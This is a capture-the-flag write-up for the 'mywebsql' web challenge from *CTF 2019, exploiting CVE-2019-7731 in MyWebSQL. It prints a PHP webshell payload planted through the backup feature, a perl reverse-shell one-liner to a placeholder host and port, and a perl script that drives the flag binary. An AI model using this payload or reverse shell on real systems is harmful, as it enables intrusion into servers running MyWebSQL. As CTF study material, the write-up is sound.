*CTF 2019 - Write-up

Table of contents
  1. 🔗Information
    1. 🔗CTF
  2. 🔗mywebsql - Web
    1. 🔗OSINT
    2. 🔗Exploit
    3. 🔗Read the flag

🔗Information

🔗CTF

  • Name : *CTF 2019
  • Website : wpictf.xyz
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

🔗mywebsql - Web

http://34.92.36.201:10080/

🔗OSINT

Let's find intel about MyWebSQL. We can look for:

  • MyWebSQL 3.7 Backup Archive File Remote Code Execution
  • CVE-2019-7731 exploit

And finally I found some links:

🔗Exploit

Now that I found the PoC of CVE-2019-7731, let's exploit it:

  1. Login the WebUI with admin/admin.
  2. Created a table noraj
  3. Created an entry with value <?php system($_GET[cmd]); ?>
  4. Used the Backup Database feature and rename the backup file to noraj.php
  5. Go to http://34.92.36.201:10080/backups/noraj.php?cmd=id and execute commands in our fresh webshell

🔗Read the flag

Let's try cmd=/readflag | base64

1
2
3
4
5
6
7
$ printf %s 'U29sdmUgdGhlIGVhc3kgY2hhbGxlbmdlIGZpcnN0CigoKCgoLTk4OTczMyktKC0zNjMxMjEpKS0oLTI3OTQwMSkpKygyNTE2MjApKS0oLTUxNzMyOSkpCmlucHV0IHlvdXIgYW5zd2VyOiBjYWxjdWxhdGUgZXJyb3IhCg==' | base64 -d
Solve the easy challenge first
(((((-989733)-(-363121))-(-279401))+(251620))-(-517329))
input your answer: calculate error!
$ irb
irb(main):001:0> (((((-989733)-(-363121))-(-279401))+(251620))-(-517329))
=> 421738

But the binary that read the flag seems to require interactivity. It is reading the protected /flag.

Let's get the binary locally: cmd=cat /readflag | base64 | tr -d "\n".

Even if not required I managed to get a reverse shell with perl:

1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Then my mate 0xUKN remembered a CTF challenge that was similar (interact with a binary from a non-interactive shell).

It was the l33t-hoster challenge from Insomni'hack teaser 2019.

As there is perl of the server and that my perl reverse shell worked fine, I choose to re-use the solution from the CTF team GoN (https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack 2019/l33t-hoster/l33t-hoster.md) that used a perl script to interact with the binary I/O.

I first tried to inline it and execute it as a one-liner with perl -e.

1
perl -e 'use warnings;use strict;use IPC::Open2;$| = 1;chdir "/";my $pid = open2(\*out2, \*in2, "/readflag") or die;my $reply = <out2>;print STDOUT $reply;$reply = <out2>;print STDOUT $reply;my $answer = eval($reply);print STDOUT "answer: $answer\n"; print in2 " $answer ";in2->flush();$reply = <out2>;print STDOUT $reply;'

This was working but the flag was not printed because it was outputted to STDERR rather than STDOUT.

So I wrote the perl script in a file and executed the script redirecting STDERR to STDOUT:

1
2
3
4
$ printf %s 'use warnings;use strict;use IPC::Open2;$| = 1;chdir "/";my $pid = open2(\*out2, \*in2, "/readflag") or die;my $reply = <out2>;print STDOUT $reply;$reply = <out2>;print STDOUT $reply;my $answer = eval($reply);print STDOUT "answer: $answer\n"; print in2 " $answer ";in2->flush();$reply = <out2>;print STDOUT $reply;' > noraj.pl
$ perl noraj.pl > s3 2>&1
$ cat s3
*CTF{h4E9PKLkr6HTO3JcRglVdYaBSA0eDU8y}
Share